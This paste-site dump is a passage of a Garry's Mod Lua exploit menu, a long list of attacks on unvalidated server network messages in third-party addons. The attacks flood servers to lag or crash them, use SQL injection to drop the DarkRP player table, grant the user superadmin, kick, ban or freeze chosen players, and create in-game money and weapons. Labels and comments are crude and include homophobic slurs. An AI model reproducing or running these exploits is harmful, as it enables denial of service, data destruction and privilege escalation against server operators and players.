  802. s.AddExploit(2,"Lags? #7","Just lags","pac_submit",function()
  803. for j=1,2200 do
  804. net.Start("pac_submit")
  805. net.SendToServer()
  806. end
  807. end, 1,0,"_sex_lagz_7",0.3)
  808. /*s.AddExploit(2,"Lags? #37","Just lags","dlib.getinfo.replicate",function()
  809. for j=1,2000 do
  810. net.Start("dlib.getinfo.replicate")
  811. net.SendToServer()
  812. end
  813. end, 1,0,"_sex_lagz_37",0.3)*/
  814. s.AddExploit(2,"Lags? #8","Just lags","steamid2",function()
  815. for j=1,100 do
  816. net.Start( "steamid2" )
  817. net.WriteString( s.LagText )
  818. net.SendToServer()
  819. end
  820. end, 1,0,"_sex_lagz_8",0)
  821. s.AddExploit(2,"Lags? #9","Just lags","NDES_SelectedEmblem",function()
  822. for j=1,2000 do
  823. net.Start( "NDES_SelectedEmblem" )
  824. net.WriteString( s.LagText )
  825. net.SendToServer()
  826. end
  827. end, 1,0,"_sex_lagz_9",0.5)
  828. s.AddExploit(2,"Lags? #10","Just lags","Morpheus.StaffTracker",function()
  829. for j=1,2000 do
  830. net.Start("Morpheus.StaffTracker")
  831. net.SendToServer()
  832. end
  833. end, 1,0,"_sex_lagz_10",0.1)
  834. s.AddExploit(2,"Lags? #11","Just lags","join_disconnect",function()
  835. local gay = player.GetAll()[1]
  836. for j=1,1100 do
  837. net.Start("join_disconnect")
  838. net.WriteEntity(gay)
  839. net.SendToServer()
  840. end
  841. end, 1,0,"_sex_lagz_11",0.05)
  842. s.AddExploit(4,"Get superadmin","lol u're lucky","pplay_deleterow",function()
  843. print("im started")
  844. local id = LocalPlayer():SteamID()
  845. local tbl = {}
  846. tbl.name = "FAdmin_PlayerGroup"
  847. tbl.where = {
  848. "steamid",
  849. tostring(id)
  850. }
  851. net.Start("pplay_deleterow")
  852. net.WriteTable(tbl)
  853. net.SendToServer()
  854. local tbl = {}
  855. tbl.tblname = "FAdmin_PlayerGroup"
  856. tbl.tblinfo = {
  857. tostring(id),
  858. "superadmin"
  859. }
  860. net.Start("pplay_addrow")
  861. net.WriteTable(tbl)
  862. net.SendToServer()
  863. end, 0,0)
  864. s.AddExploit(2,"Lags? #12","Just lags","EZS_PlayerTag",function()
  865. for j=1,1000 do
  866. for k, v in pairs(player.GetAll()) do
  867. net.Start( "EZS_PlayerTag" )
  868. net.WriteEntity(v)
  869. net.WriteString(v:Name())
  870. net.SendToServer()
  871. end
  872. end
  873. end, 1,0,"_sex_lagz_12",0.2)
  874. s.AddExploit(4,"Remove server sql data","Just removes data","pplay_sendtable",function()
  875. local tbl = {}
  876. tbl.tblname = "darkrp_door; DROP TABLE darkrp_player; CREATE TABLE darkrp_player(a STRING)"
  877. tbl.ply = LocalPlayer()
  878. net.Start("pplay_sendtable")
  879. net.WriteTable(tbl)
  880. net.SendToServer()
  881. end, 0,0)
  882. s.AddExploit(4,"fuck server data","Just rape server data","WriteQuery",function()
  883. for i=1,2200 do
  884. net.Start( "WriteQuery" )
  885. --net.WriteString("1")
  886. net.SendToServer()
  887. end
  888. end, 1,0,"_sex_rip_data",0.3)
  889. s.AddExploit(3,"Free rp money #4","Gives u free money from shit","SendMoney",function()
  890. net.Start( "SendMoney" )
  891. net.WriteEntity( LocalPlayer() )
  892. net.WriteEntity( LocalPlayer() )
  893. net.WriteEntity( LocalPlayer() )
  894. net.WriteString( "-1000000" )
  895. net.SendToServer()
  896. end, 1,0,"_sex_free_money_4",1)
  897. s.AddExploit(3,"Free rp money #5","Gives u free money from bail","BailOut",function()
  898. for k, v in pairs(player.GetAll()) do
  899. net.Start( "BailOut" )
  900. net.WriteEntity( LocalPlayer() )
  901. net.WriteEntity( v )
  902. net.WriteFloat( -1000000 )
  903. net.SendToServer()
  904. end
  905. end, 1,0,"_sex_free_money_4",1)
  906. s.AddExploit(2,"Lags? #13","Just lags","textstickers_entdata",function()
  907. for j=1,100 do
  908. net.Start( "textstickers_entdata" )
  909. net.WriteUInt( 0xFFFFFFF, 32 )
  910. net.SendToServer()
  911. end
  912. end, 1,0,"_sex_lagz_13",0.5 )
  913. s.AddExploit(4,"Fuck name for all","type name in textentry","NC_GetNameChange",function()
  914. for k, v in pairs( player.GetAll() ) do
  915. net.Start("NC_GetNameChange")
  916. net.WriteEntity(v)
  917. net.WriteString(s.TE:GetText())
  918. net.WriteString(s.TE:GetText())
  919. net.SendToServer()
  920. end
  921. end, 0,0)
  922. s.AddExploit(1,"Shitty console spam","type spam message in textentry","",function()
  923. for i=1, 10 do
  924. LocalPlayer():ConCommand( "_u "..s.TE:GetText() )
  925. end
  926. end, 1,0,"_sex_shit_con_spamer",0.1)
  927. s.AddExploit(2,"Lags? #14","Just lags","Keypad",function()
  928. for i = 1, 1000 do
  929. net.Start("Keypad")
  930. net.WriteEntity(LocalPlayer())
  931. net.SendToServer()
  932. end
  933. end, 1,0,"_sex_lagz_14",0)
  934. s.AddExploit(4,"God","Gives u godmode lol","RevivePlayer",function()
  935. if(!LocalPlayer():Alive())then
  936. net.Start("RevivePlayer")
  937. net.WriteEntity(LocalPlayer())
  938. net.SendToServer()
  939. end
  940. end, 1,0,"_sex_god",1)
  941. s.AddExploit(3,"Free rp weapons","Gives u 3 weapons","ARMORY_RetrieveWeapon",function()
  942. for i=1,3 do
  943. timer.Simple(i,function()
  944. net.Start("ARMORY_RetrieveWeapon")
  945. net.WriteString("weapon"..tostring(i))
  946. net.SendToServer()
  947. end)
  948. end
  949. end, 0,0)
  950. if s.ChatClear then
  951. s.AddExploit(1,"Chat spam","real b1g spam","",function()
  952. for i=1,2 do
  953. ChatClear.Run()
  954. end
  955. end, 1,0,"_sex_chat_kill",0.01)
  956. s.AddExploit(1,"Chat spam OOC","real b1g spam","",function()
  957. for i=1,2 do
  958. ChatClear.OOC()
  959. end
  960. end, 1,0,"_sex_chat_kill_2",0.01)
  961. end
  962. s.AddExploit(3,"Free rp money #6","Gives u free money from roll","ckit_roul_bet",function()
  963. net.Start("ckit_roul_bet")
  964. net.WriteEntity(LocalPlayer())
  965. net.WriteString("")
  966. net.WriteString("")
  967. net.WriteUInt(tonumber(s.TE:GetText()), 16)
  968. net.SendToServer()
  969. end, 0,0)
  970. s.AddExploit(3,"Fuck names free","Fuck all rp names its cool","NC_GetNameChange",function()
  971. for k, v in pairs( player.GetAll() ) do
  972. net.Start("NC_GetNameChange")
  973. net.WriteEntity(v)
  974. net.WriteString(" ")
  975. net.WriteString(" ")
  976. net.SendToServer()
  977. end
  978. end, 1,0,"_sex_fuckname",5)
  979. s.AddExploit(4,"Legit server crash","absolytely legit lol","NET_SS_DoBuyTakeoff",function()
  980. net.Start( "NET_SS_DoBuyTakeoff" )
  981. net.WriteEntity(LocalPlayer())
  982. net.WriteEntity(table.Random(player.GetAll()))
  983. net.WriteTable({})
  984. net.WriteInt(-100000000 , 16)
  985. net.SendToServer()
  986. end, 0,0)
  987. s.AddExploit(1,"ByB Force Bail","idk that copypaste","Letthisdudeout",function()
  988. net.Start("Letthisdudeout")
  989. net.WriteEntity(LocalPlayer())
  990. net.SendToServer()
  991. end, 0,0)
  992.  
  993. s.AddExploit(2,"Fuck Player Chat","just lag player who use atlas chat","atlaschat.chat",function() -- need a test with lox
  994. for i=1,#s.Target do
  995. net.Start("atlaschat.rqclrcfg")
  996. net.WriteString(s.Target[i]:Name())
  997. net.SendToServer()
  998. end
  999. end, 1,0,"_sex_atlas_fuck",0.1)
  1000.  
  1001. s.AddExploit(3,"Kick Targets","just kick selected players","plyWarning",function()
  1002. for i=1,#s.Target do
  1003. timer.Simple(i,function()
  1004. net.Start("plyWarning")
  1005. net.WriteEntity(s.Target[i])
  1006. net.WriteString('You have to select a player before doing a action.')
  1007. net.SendToServer()
  1008. end)
  1009. end
  1010. end, 0,0)
  1011.  
  1012.  
  1013. s.AddExploit(3,"Freeze Targets","just freeze selected players","NLR.ActionPlayer",function()
  1014. for i=1,#s.Target do
  1015. net.Start("NLR.ActionPlayer")
  1016. net.WriteEntity(s.Target[i])
  1017. net.SendToServer()
  1018. end
  1019. end, 0,0)
  1020.  
  1021. s.AddExploit(3,"Kick Targets","just kick selected players","uPLYWarning",function()
  1022. for i=1,#s.Target do
  1023. timer.Simple(i,function()
  1024. for j=0, 1000 do
  1025. net.Start("uPLYWarning")
  1026. net.WriteEntity(s.Target[i])
  1027. net.WriteString('You have to select a player before doing a action.')
  1028. net.SendToServer()
  1029. end
  1030. end)
  1031. end
  1032. end, 0,0)
  1033.  
  1034. s.AddExploit(3,"Ban Targets","just ban selected players","banleaver",function()
  1035. for i=1,#s.Target do
  1036. net.Start("banleaver")
  1037. net.WriteString(tostring(s.Target[i]:SteamID().."{sep}"..tostring(s.Target[i]:Name())))
  1038. net.SendToServer()
  1039. end
  1040. end, 0,0)
  1041. s.AddExploit(2,"Lags? #15","Just lags","DarkRP_spawnPocket",function()
  1042. for i=1,10000 do
  1043. net.Start("DarkRP_spawnPocket")
  1044. net.SendToServer()
  1045. end
  1046. end, 1,0,"_sex_lagz_15",1)
  1047.  
  1048. s.AddExploit(3,"Free rp money #7","Gives u free money from hit","hhh_request",function()
  1049. local hitRequest = {}
  1050. hitRequest.hitman = LocalPlayer()
  1051. hitRequest.requester = LocalPlayer()
  1052. hitRequest.target = table.Random(player.GetAll())
  1053. hitRequest.reward = -999999
  1054. net.Start( 'hhh_request' )
  1055. net.WriteTable( hitRequest )
  1056. net.SendToServer()
  1057. end, 0,0)
  1058.  
  1059. s.AddExploit(3,"Free rp money #8","Gives u free money from hit","hitcomplete",function()
  1060. net.Start("hitcomplete")
  1061. net.WriteDouble( GetConVarNumber("bh_hitmenuammount") )
  1062. net.SendToServer()
  1063. end, 1,0,"_sex_izi_money",1)
  1064.  
  1065. s.AddExploit(3,"Kick Targets","just kick selected players","GetCar",function()
  1066. for i=1,#s.Target do
  1067. timer.Simple(i,function()
  1068. for j=0, 700 do
  1069. net.Start("GetCar")
  1070. net.WriteEntity(s.Target[i])
  1071. net.WriteEntity(s.Target[i])
  1072. net.SendToServer()
  1073. end
  1074. end)
  1075. end
  1076. end, 0,0)
  1077.  
  1078. s.AddExploit(3,"Duel Crazy","Fuck all with all","DuelMessageReturn",function()
  1079. s.duel[1] = table.Random( player.GetAll() )
  1080. s.duel[2] = table.Random( player.GetAll() )
  1081. net.Start("DuelMessageReturn")
  1082. net.WriteFloat(1)
  1083. net.WriteTable(s.duel)
  1084. net.SendToServer()
  1085. end, 1,0,"_sex_duel_exploit",0.1)
  1086.  
  1087. s.AddExploit(2,"Lags? #16","Just lags","dLogsGetCommand",function()
  1088. for i=1,7000 do
  1089. net.Start('dLogsGetCommand')
  1090. net.WriteTable(s.lagz16)
  1091. net.SendToServer()
  1092. end
  1093. end, 1,0,"_sex_lagz_16",3)
  1094. s.AddExploit(3,"Remove shit","Just remove Targets & text entry class props","MDE_RemoveStuff_C2S",function()
  1095. for i=1,#s.Target do
  1096. net.Start( "MDE_RemoveStuff_C2S" )
  1097. net.WriteTable( {DATA="",TARGET=s.Target[i]} )
  1098. net.SendToServer()
  1099. end
  1100. for i=1,#ents.FindByClass(s.TE:GetText()) do
  1101. net.Start( "MDE_RemoveStuff_C2S" )
  1102. net.WriteTable( {DATA="",TARGET=ents.FindByClass(s.TE:GetText())[i]} )
  1103. net.SendToServer()
  1104. end
  1105. end, 1,0,"_sex_godly_remover",2)
  1106.  
  1107. s.AddExploit(1,"Break handcuffs","Try its free!","Kun_ZiptieStruggle",function()
  1108. for i=0,30 do
  1109. net.Start("Kun_ZiptieStruggle")
  1110. net.SendToServer()
  1111. end
  1112. end, 0,0)
  1113. s.AddExploit(3,"Free rp money #9","Gives u free money from drugs","Kun_SellDrug",function()
  1114. net.Start("Kun_SellDrug")
  1115. net.WriteString("Meth")
  1116. net.SendToServer()
  1117. end, 0,0)
  1118. s.AddExploit(3,"Free rp money #10","Gives u free money from carz","BuyCar",function()
  1119. net.Start("BuyCar")
  1120. net.WriteFloat(-1000000000000)
  1121. net.WriteEntity(LocalPlayer())
  1122. net.WriteString(s.LagText)
  1123. net.WriteString(s.LagText)
  1124. net.WriteString(s.LagText)
  1125. net.SendToServer()
  1126. end, 0,0)
  1127. s.AddExploit(3,"Free rp money #11","Gives u free money from vcmod","AttemptSellCar",function()
  1128. for i=0,30 do
  1129. for i=1,10 do
  1130. net.Start( "AttemptSellCar" )
  1131. net.WriteInt( i, 8 )
  1132. net.SendToServer()
  1133. end
  1134. end
  1135. end, 0,0)
  1136. s.AddExploit(3,"Get Free le car","Write number in text entry (0 or 1 or more)","race_accept",function()
  1137. net.Start("race_accept")
  1138. net.WriteInt(tonumber(s.TE:GetText()),16)
  1139. net.SendToServer()
  1140. end, 0,0)
  1141. s.AddExploit(2,"Lags? #17","Just lags","ats_send_toServer",function()
  1142. for i=1,2000 do
  1143. net.Start("ats_send_toServer")
  1144. net.WriteTable(s.lags17)
  1145. net.SendToServer()
  1146. end
  1147. end, 1,0,"_sex_lagz_17",0.5)
  1148. s.AddExploit(2,"Spawn Track","idk shit","FIRE_CreateFireTruck",function()
  1149. net.Start("FIRE_CreateFireTruck")
  1150. net.SendToServer()
  1151. end, 0,0)
  1152. s.AddExploit(3,"Ban Targets","ban selected players && textentry input - ban message","gBan.BanBuffer",function()
  1153. for i=1,#s.Target do
  1154. net.Start( "gBan.BanBuffer" )
  1155. net.WriteBool( true )
  1156. net.WriteInt( 0, 32 )
  1157. net.WriteString( s.TE:GetText() )
  1158. net.WriteString( s.Target[i]:SteamID() )
  1159. net.SendToServer()
  1160. end
  1161. end, 0,0)
  1162. s.AddExploit(2,"Lags? #18","Just lags","pac.net.TouchFlexes.ClientNotify",function()
  1163. for i=1, 400 do
  1164. net.Start( "pac.net.TouchFlexes.ClientNotify" )
  1165. net.WriteInt( 9999999999999999999999999999999999999999999999999999999999999999999998, 13)
  1166. net.SendToServer()
  1167. end
  1168. end, 1,0,"_sex_lagz_18",0.3)
  1169. s.AddExploit(3,"Free rp money #12","Gives u free money from shit","ply_pick_shit",function()
  1170. for k, v in pairs (player.GetAll()) do
  1171. for i = 1,255 do
  1172. net.Start("ply_pick_shit")
  1173. net.WriteEntity(LocalPlayer())
  1174. net.WriteEntity(v)
  1175. net.SendToServer()
  1176. end
  1177. end
  1178. end, 0,0)
  1179. s.AddExploit(2,"Give physgun","Gives u free physgun","BuyFirstTovar",function()
  1180. net.Start("BuyFirstTovar")
  1181. net.WriteString("0")
  1182. net.SendToServer()
  1183. end, 0,0)
  1184. s.AddExploit(2,"Give physgun","Gives u free physgun","BuySecondTovar",function()
  1185. net.Start("BuySecondTovar")
  1186. net.WriteString("0")
  1187. net.SendToServer()
  1188. end, 0,0)
  1189. s.AddExploit(4,"Set Health","type number of health in textentry","GiveHealthNPC",function()
  1190. net.Start("GiveHealthNPC")
  1191. net.WriteString("100")
  1192. net.SendToServer()
  1193. end, 1,0,"_sex_gay_timer",1)
  1194. s.AddExploit(1,"Free shitty key","key = gey","BuyKey",function()
  1195. net.Start("BuyKey")
  1196. net.SendToServer()
  1197. end, 0,0)
  1198. s.AddExploit(1,"Free shitty case","case = cs go = shit","BuyCrate",function()
  1199. net.Start("BuyCrate")
  1200. net.SendToServer()
  1201. end, 0,0)
  1202. s.AddExploit(3,"Free Weapons","gives u more free weapons","MONEY_SYSTEM_GetWeapons",function()
  1203. for i = 1,32 do
  1204. net.Start("MONEY_SYSTEM_GetWeapons")
  1205. net.WriteInt(i, 8)
  1206. net.SendToServer()
  1207. end
  1208. end, 0,0)
  1209. s.AddExploit(2,"Demote gays","demote targets","MCon_Demote_ToServer",function()
  1210. for i = 1,#s.Target do
  1211. net.Start("MCon_Demote_ToServer")
  1212. net.WriteString(s.Target[i]:SteamID())
  1213. net.SendToServer()
  1214. end
  1215. end, 0,0)
  1216. s.AddExploit(3,"Free rp money #13","Gives u free money from printerz","SyncPrinterButtons16690",function()
  1217. for k, v in pairs(ents.GetAll()) do
  1218. if v:GetModel() == "models/props_c17/consolebox01a.mdl" then
  1219. net.Start( "SyncPrinterButtons16690" )
  1220. net.WriteEntity(v)
  1221. net.WriteUInt(2, 4)
  1222. net.SendToServer()
  1223. end
  1224. end
  1225. end, 1,0,"_sex_rp_shit_13",5)
  1226. s.AddExploit(3,"Free rp money #14","Gives u free money from printerz","withdrawp",function()
  1227. for k,v in pairs(ents.FindByClass("derma_printer")) do
  1228. net.Start("withdrawp")
  1229. net.WriteEntity(v)
  1230. net.SendToServer()
  1231. end
  1232. print("printerov:".. tostring(#ents.FindByClass("derma_printer")))
  1233. end, 1,0,"_sex_rp_shit_14",5)
  1234.  
  1235. --ents.FindByClass("derma_printer")
  1236.  
  1237. s.AddExploit(3,"Free rp money #99","Gives u free money from printerz","wordenns",function()
  1238. for k,v in pairs(ents.FindByClass("derma_printer")) do
  1239. net.Start("wordenns")
  1240. net.WriteEntity(v)
  1241. net.SendToServer()
  1242. end
  1243. print("printerov:".. tostring(#ents.FindByClass("derma_printer")))
  1244. end, 1,0,"_sex_rp_shit_99",5)
  1245.  
  1246. s.AddExploit(3,"Free rp money #15","Gives u free money from shit","DarkRP_SS_Gamble",function()
  1247. net.Start( "DarkRP_SS_Gamble" )
  1248. net.WriteInt(50000, 32)
  1249. net.WriteInt(1, 32)
  1250. net.WriteInt(0, 32)
  1251. net.WriteInt(0, 32)
  1252. net.WriteInt(1, 32)
  1253. net.SendToServer()
  1254. end, 0,0)
  1255. s.AddExploit(3,"Free rp money #16","Gives u free money from printerz","SyncPrinterButtons76561198056171650",function()
  1256. for k, v in pairs(ents.GetAll()) do
  1257. if( v:GetClass():find("print") ) then
  1258. net.Start( "SyncPrinterButtons76561198056171650" )
  1259. net.WriteEntity(v)
  1260. net.WriteUInt(2, 4)
  1261. net.SendToServer()
  1262. end
  1263. end
  1264. end, 1,0,"_sex_rp_shit_16",5)
  1265. s.AddExploit(2,"Unbox shit","idk check pointshop2 (F*)","net_PSUnBoxServer",function()
  1266. for k,v in pairs(player.GetAll()) do
  1267. local i = 0
  1268. for k2,v2 in pairs(PS.Items) do
  1269. if !v:PS_HasItem(v2.ID) then
  1270. timer.Simple(k*i*1.7,function()
  1271. net.Start("net_PSUnBoxServer")
  1272. net.WriteEntity(v)
  1273. net.WriteString(v2.ID)
  1274. net.SendToServer()
  1275. end)
  1276. end
  1277. i = i + 1
  1278. end
  1279. end
  1280. end, 0,0)
  1281. s.AddExploit(3,"Kick targetz #idk","select gays and kick they","RecKickAFKer",function()
  1282. for i=1,#s.Target do
  1283. net.Start("RecKickAFKer")
  1284. net.WriteEntity(s.Target[i])
  1285. net.SendToServer()
  1286. end
  1287. end, 0,0)
  1288. s.AddExploit(2,"Lags? #19","Just lags","TFA_Attachment_RequestAll",function()
  1289. for i=1, 500 do
  1290. net.Start("TFA_Attachment_RequestAll")
  1291. net.SendToServer()
  1292. end
  1293. end, 1,0,"_sex_lagz_19",0.05)
  1294. s.AddExploit(3,"Free rp money #17","Select target & money count","75_plus_win",function()
  1295. for i=1,#s.Target do
  1296. net.Start( "75_plus_win" )
  1297. net.WriteString(s.TE:GetText())
  1298. net.WriteEntity(s.Target[i])
  1299. net.SendToServer()
  1300. end
  1301. end, 0,0)
  1302. s.AddExploit(3,"Free rp money #18","just money (number in text entry)","ATMDepositMoney",function()
  1303. net.Start( "ATMDepositMoney" )
  1304. net.WriteFloat( tonumber(s.TE:GetText()) )
  1305. net.SendToServer()
  1306. end, 0,0)
  1307. s.AddExploit(3,"Free rp money #19","gives u free money from mining","SellMinerals",function()
  1308. for k,v in pairs(SkillDB) do
  1309. if not ( v.iSkill == true ) then
  1310. net.Start("Upgrade")
  1311. net.WriteTable( { LuaName = v.LuaName, Amount = -100000000 } )
  1312. net.SendToServer()
  1313. net.Start( "SellMinerals" )
  1314. net.WriteTable( { Target = LocalPlayer() } )
  1315. net.SendToServer()
  1316. end
  1317. end
  1318. end, 0,0)
  1319. s.AddExploit(3,"Free rp money #20","gives u free money from bet","TakeBetMoney",function()
  1320. net.Start( "TakeBetMoney" )
  1321. net.WriteTable({1e333333 , 1e333333})
  1322. net.SendToServer()
  1323. end, 0,0)
  1324. s.AddExploit(3,"Free rp money #21","gives u free money from oil","Kun_SellOil",function()
  1325. for k,v in pairs(ents.GetAll()) do
  1326. net.Start("Kun_SellOil")
  1327. net.WriteEntity(v)
  1328. net.SendToServer()
  1329. end
  1330. end, 0,0)
  1331. s.AddExploit(3,"Free rp money #22","gives u free money from deposit (number in text entry)","Kun_SellOil",function()
  1332. for k,v in pairs(player.GetAll()) do
  1333. net.Start( "DepositMoney" )
  1334. net.WriteEntity(v)
  1335. net.WriteString(tonumber(s.TE:GetText()) )
  1336. net.WriteEntity(v)
  1337. net.SendToServer()
  1338. end
  1339. end, 0,0)
  1340. s.AddExploit(3,"Free rp money #23","gives u free money from taxi (number in text entry)","NET_EcSetTax",function()
  1341. net.Start("NET_EcSetTax")
  1342. net.WriteInt(tonumber(s.TE:GetText()) , 16)
  1343. net.SendToServer()
  1344. end, 0,0)
  1345. s.AddExploit(3,"Free rp money #24","Select target & money count","RP_Accept_Fine",function()
  1346. for i=1,#s.Target do
  1347. net.Start("RP_Accept_Fine")
  1348. net.WriteString(s.Target[i])
  1349. net.WriteDouble(tonumber(s.TE:GetText()))
  1350. net.SendToServer()
  1351. end
  1352. end, 0,0)
  1353. s.AddExploit(3,"Free rp money #25","gives u free money from shop","CRAFTINGMOD_SHOP",function()
  1354. net.Start("CRAFTINGMOD_SHOP")
  1355. net.WriteTable({
  1356. BUY = -100000000,
  1357. type = 1
  1358. })
  1359. net.WriteInt(1,16)
  1360. net.SendToServer()
  1361. end, 0,0)
  1362. s.AddExploit(4,"Auto-loot","collect all loot on map","GMBG:PickupItem",function()
  1363. for k, v in pairs(ents.GetAll()) do
  1364. if v:GetClass() == "item_loot" then
  1365. for i=1,6 do
  1366. net.Start("GMBG:PickupItem")
  1367. net.WriteEntity(v)
  1368. net.SendToServer()
  1369. end
  1370. end
  1371. end
  1372. end, 1,0,"_sex_autoloot_1",2)
  1373.  
  1374. s.AddExploit(3,"Free rp money #26","gives u free money from kart","kart_sell",function()
  1375. for i=1, 300 do
  1376. net.Start("kart_sell")
  1377. net.WriteString("sw_gokart")
  1378. net.SendToServer()
  1379. end
  1380. end, 0,0)
  1381. s.AddExploit(3,"Free rp money #27","gives u free money (number in text entry)","ClickerAddToPoints",function()
  1382. net.Start("ClickerAddToPoints")
  1383. net.WriteInt(tonumber(s.TE:GetText()), 32)
  1384. net.SendToServer()
  1385. end, 0,0)
  1386.  
  1387. s.AddExploit(3,"Free rp money #28","gives u free money (number in text entry)","TOW_SubmitWarning",function()
  1388. for k,v in pairs(ents.GetAll()) do
  1389. net.Start("TOW_SubmitWarning")
  1390. net.WriteString(LocalPlayer():SteamID())
  1391. net.WriteDouble(tonumber(s.TE:GetText()))
  1392. net.WriteEntity(v)
  1393. net.SendToServer()
  1394. net.Start("TOW_PayTheFine")
  1395. net.WriteEntity(v)
  1396. net.SendToServer()
  1397. end
  1398. end, 0,0)
  1399. s.AddExploit(2,"Lags? #23","Just lags","sphys_dupe",function()
  1400. for i=1,2200 do
  1401. net.Start("sphys_dupe")
  1402. net.SendToServer()
  1403. end
  1404. end, 1,0,"_sex_lagz_23",0.2)
  1405.  
  1406. s.AddExploit(2,"Lags? #24","Just lags","minigun_drones_switch",function()
  1407. for i=1,2200 do
  1408. net.Start("minigun_drones_switch")
  1409. net.SendToServer()
  1410. end
  1411. end, 1,0,"_sex_lagz_24",0.2)
  1412.  
  1413. s.AddExploit(2,"CW2 Lags? #25","Just lags (u need cw2 weapon in hand)","CW20_PRESET_LOAD",function()
  1414. if(LocalPlayer():GetActiveWeapon():GetClass():find("cw"))then
  1415. for i=1,2200 do
  1416. net.Start("CW20_PRESET_LOAD")
  1417. net.SendToServer()
  1418. end
  1419. end
  1420. end, 1,0,"_sex_lagz_25",0.2)
  1421.  
  1422. s.AddExploit(2,"Lags? #25","Just lags","dronesrewrite_controldr",function()
  1423. for i=1,2200 do
  1424. net.Start("dronesrewrite_controldr")
  1425. net.SendToServer()
  1426. end
  1427. end, 1,0,"_sex_lagz_25",0.2)
  1428.  
  1429. s.AddExploit(2,"Lags? #26","Just lags","SBP_addtime",function()
  1430. for i=1,2000 do
  1431. net.Start("SBP_addtime")
  1432. net.SendToServer()
  1433. end
  1434. end, 1,0,"_sex_lagz_26",0.3)
  1435.  
  1436. s.AddExploit(3,"XP booster","gives u xp (enter boost in shit her)","SBP_addtime",function()
  1437. for i=1,tonumber(s.TE:GetText()) do
  1438. net.Start("SBP_addtime")
  1439. net.SendToServer()
  1440. end
  1441. end, 1,0,"_sex_xp_boost",0.2)
  1442.  
  1443. s.AddExploit(3,"Poop on player","spam effects on selected player","simfphys_gasspill",function()
  1444. for i=1,#s.Target do
  1445. for j=1,3 do
  1446. if IsValid(s.Target[i]) then
  1447. net.Start("simfphys_gasspill")
  1448. net.WriteVector(s.Target[i]:GetPos()+Vector(0,0,90))
  1449. net.WriteVector(s.Target[i]:EyePos())
  1450. net.SendToServer()
  1451. end
  1452. end
  1453. end
  1454. end, 1,0,"_sex_pooper",0.1)
  1455. s.AddExploit(3,"test","Just test","friendlist",function()
  1456. for i=1,500 do
  1457. net.Start("friendlist")
  1458. net.WriteTable({"ur father"})
  1459. net.SendToServer()
  1460. end
  1461. end, 1,0,"test",0.2)
  1462. s.AddExploit(3,"Outfit player nouser","Just noise players near u","NetData",function()
  1463. for i=1,200 do
  1464. net.Start("NetData")
  1465. net.WriteString("OF")
  1466. net.WriteUInt(4,8)
  1467. net.WriteData(math.random(100000,9999999)..",sis.mdl",30)
  1468. net.SendToServer()
  1469. end
  1470. end, 1,0,"_sex_ofn",0.2)
  1471.  
  1472. -- leith cool shit (untested)
  1473.  
  1474. s.AddExploit(2,"Lags? #27","Just lags","IGS.GetPaymentURL",function()
  1475. for i=1,1100 do
  1476. net.Start("IGS.GetPaymentURL")
  1477. net.WriteDouble(9999999999999999999999999999999999999999999999999999999999)
  1478. net.SendToServer()
  1479. end
  1480. end, 1,0,"_sex_lagz_27",0.2)
  1481.  
  1482. s.AddExploit(2,"Lags? #28","Just lags","pp_info_send",function()
  1483. for i=1,2200 do
  1484. net.Start("pp_info_send")
  1485. net.SendToServer()
  1486. end
  1487. end, 1,0,"_sex_lagz_28",0.2)
  1488.  
  1489. s.AddExploit(2,"Lags? #29","Just lags","BeginSpin",function()
  1490. for i=1,2200 do
  1491. net.Start("BeginSpin")
  1492. net.SendToServer()
  1493. end
  1494. end, 1,0,"_sex_lagz_29",0.2)
  1495.  
  1496. --
  1497.  
  1498. s.AddExploit(2,"Lags? #30","Just lags","RHC_jail_player",function()
  1499. for i=1,550 do
  1500. net.Start("RHC_jail_player")
  1501. net.WriteEntity(game.GetWorld())
  1502. net.WriteFloat(-9999.999999999999999999999999999999999999999999)
  1503. net.SendToServer()
  1504. end
  1505. end, 1,0,"_sex_lagz_30",0.2)
  1506.  
  1507. s.AddExploit(3,"Free Moneyz","Monyez from bitcoins (untested)","BM2.Command.SellBitcoin",function()
  1508. for k, v in pairs(ents.FindByClass("bm2_bitminer_1")) do
  1509. net.Start("BM2.Command.SellBitcoins")
  1510. net.WriteEntity(v)
  1511. net.SendToServer()
  1512. end
  1513.  
  1514. for k, v in pairs(ents.FindByClass("bm2_bitminer_2")) do
  1515. net.Start("BM2.Command.SellBitcoins")
  1516. net.WriteEntity(v)
  1517. net.SendToServer()
  1518. end
  1519.  
  1520. for k, v in pairs(ents.FindByClass("bm2_bitminer_rack")) do
  1521. net.Start("BM2.Command.SellBitcoins")
  1522. net.WriteEntity(v)
  1523. net.SendToServer()
  1524. end
  1525. end, 0,0)
  1526.  
  1527.  
  1528.  
  1529. --[[
  1530.  
  1531. cpk_remove
  1532.  
  1533. s.AddExploit(1,"name","desc","netstr",function()
  1534.  
  1535. end, 1,0,"timername",0.5)
  1536. gcap_victim ControllerAction
  1537. SmartTurret_Tag XMark SpecDM_SendLoadout (в сенд лоадаут 2 стринга) friendlist
  1538.  
  1539. net.Start("friendlist")
  1540.  
  1541. net.WriteTable({"ur father"})
  1542.  
  1543. net.SendToServer()
  1544.  
  1545. ]]--
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement